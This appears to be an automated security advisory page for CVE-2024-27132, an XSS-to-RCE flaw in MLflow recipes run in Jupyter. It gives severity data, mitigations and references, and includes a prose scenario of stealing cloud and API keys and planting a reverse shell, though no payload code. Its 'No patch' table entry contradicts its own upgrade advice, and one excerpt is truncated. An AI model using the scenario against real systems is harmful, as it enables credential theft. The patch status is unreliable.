AI Threat Alert
CVE-2024-27132: MLflow: XSS in recipes enables client-side RCE
CRITICAL PoC AVAILABLE CISA: ATTENDMLflow recipe execution in Jupyter Notebook can trigger client-side RCE via unsanitized template variables — no credentials required, just user interaction. Any team running shared or third-party MLflow recipes is at risk of full environment compromise, including model weights, training data, and cloud credentials. Patch immediately or prohibit untrusted recipe execution until the fix is deployed.
What is the risk?
Critical risk for ML operations teams. CVSS 9.6 reflects network-reachable vector, low complexity, and high impact across confidentiality, integrity, and availability. Jupyter Notebooks typically run with the user's full OS permissions, meaning XSS-to-RCE translates to unrestricted code execution on the ML engineer's workstation or server. The no-privileges-required factor means any recipe distributed via GitHub, internal wikis, or social engineering is a viable attack vector. MLflow's widespread adoption in enterprise ML pipelines significantly expands the blast radius.
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| MLflow | pip | — | No patch |
Do you use MLflow? You're affected.
How severe is it?
What is the attack surface?
What should I do?
6 steps-
Patch: Upgrade MLflow to the version that includes PR #10873.
-
Audit: Inventory all MLflow instances and identify those using the Recipes feature.
-
Restrict: Block execution of untrusted or unreviewed recipes; enforce recipe code review gates before team-wide adoption.
-
Isolate: Run Jupyter and MLflow environments in containers with minimal OS permissions and no direct access to production credentials — use IAM roles/workload identity instead of stored keys.
-
Detect: Monitor for unexpected outbound network connections or anomalous file access originating from Jupyter processes.
-
Rotate credentials: For any environment where untrusted recipes may have been executed, rotate cloud provider credentials, API keys, and service account tokens immediately.
What does CISA's SSVC say?
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
How is it classified?
Which compliance frameworks are affected?
This CVE is relevant to:
Frequently Asked Questions
What is CVE-2024-27132?
MLflow recipe execution in Jupyter Notebook can trigger client-side RCE via unsanitized template variables — no credentials required, just user interaction. Any team running shared or third-party MLflow recipes is at risk of full environment compromise, including model weights, training data, and cloud credentials. Patch immediately or prohibit untrusted recipe execution until the fix is deployed.
Is CVE-2024-27132 actively exploited?
Proof-of-concept exploit code is publicly available for CVE-2024-27132, increasing the risk of exploitation.
How to fix CVE-2024-27132?
1. Patch: Upgrade MLflow to the version that includes PR #10873. 2. Audit: Inventory all MLflow instances and identify those using the Recipes feature. 3. Restrict: Block execution of untrusted or unreviewed recipes; enforce recipe code review gates before team-wide adoption. 4. Isolate: Run Jupyter and MLflow environments in containers with minimal OS permissions and no direct access to production credentials — use IAM roles/workload identity instead of stored keys. 5. Detect: Monitor for unexpected outbound network connections or anomalous file access originating from Jupyter processes. 6. Rotate credentials: For any environment where untrusted recipes may have been executed, rotate cloud provider credentials, API keys, and service account tokens immediately.
What systems are affected by CVE-2024-27132?
This vulnerability affects the following AI/ML architecture patterns: training pipelines, ML experiment tracking, MLOps platforms, Jupyter-based ML workflows, model registries.
What is the CVSS score for CVE-2024-27132?
CVE-2024-27132 has a CVSS v3.1 base score of 9.6 (CRITICAL). The EPSS exploitation probability is 0.87%.
What is the AI security impact?
Affected AI Architectures
MITRE ATLAS Techniques
AML.T0010.001 AI Software AML.T0011 User Execution AML.T0011.000 Unsafe AI Artifacts AML.T0025 Exfiltration via Cyber Means AML.T0049 Exploit Public-Facing Application Compliance Controls Affected
What are the technical details?
Original Advisory
Insufficient sanitization in MLflow leads to XSS when running an untrusted recipe. This issue leads to a client-side RCE when running an untrusted recipe in Jupyter Notebook. The vulnerability stems from lack of sanitization over template variables.
Exploitation Scenario
An adversary crafts a malicious MLflow recipe containing a JavaScript XSS payload embedded in template variables — for example, within a recipe YAML configuration or step definition. The recipe is distributed via a public GitHub repository, an internal Confluence page, or a Slack message to the ML team. An ML engineer clones and runs the recipe locally in Jupyter Notebook. The unsanitized template variable renders in notebook output, executing attacker-controlled JavaScript in the browser. This escalates to client-side RCE: the payload reads environment variables (AWS_ACCESS_KEY_ID, OPENAI_API_KEY, etc.), exfiltrates model artifacts or training data to an attacker-controlled endpoint, or drops a reverse shell into the ML pipeline scripts — all transparently while the engineer sees what appears to be normal recipe execution.
Weaknesses (CWE)
CWE-79 — Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'): The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
- [Architecture and Design] Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482]. Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.
- [Implementation, Architecture and Design] Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies. For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters. Parts of the same output document may require different encodings, which will vary depending on whether the output is in the: etc. Note that HTML Entity Encoding is only appropriate for the HTML body. Consult the XSS Prevention Cheat Sheet [REF-724] for more details on the types of encoding and escaping that are needed. HTML body Element attributes (such as src="XYZ") URIs JavaScript sections Casca
Source: MITRE CWE corpus.
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H References
- github.com/mlflow/mlflow/pull/10873 Issue Patch
- research.jfrog.com/vulnerabilities/mlflow-untrusted-recipe-xss-jfsa-2024-000631930/ Exploit 3rd Party
- github.com/fkie-cad/nvd-json-data-feeds Exploit
- github.com/jfrog/jupyterlab-xssguard Exploit
Timeline
Related Vulnerabilities
CVE-2025-15379 10.0 MLflow: RCE via unsanitized model dependency specs
Same package: mlflow CVE-2023-3765 10.0 MLflow: path traversal allows arbitrary file read
Same package: mlflow CVE-2026-2635 9.8 mlflow: security flaw enables exploitation
Same package: mlflow CVE-2023-2780 9.8 MLflow: path traversal allows arbitrary file read/write
Same package: mlflow CVE-2023-1177 9.8 MLflow: path traversal allows arbitrary file read/write
Same package: mlflow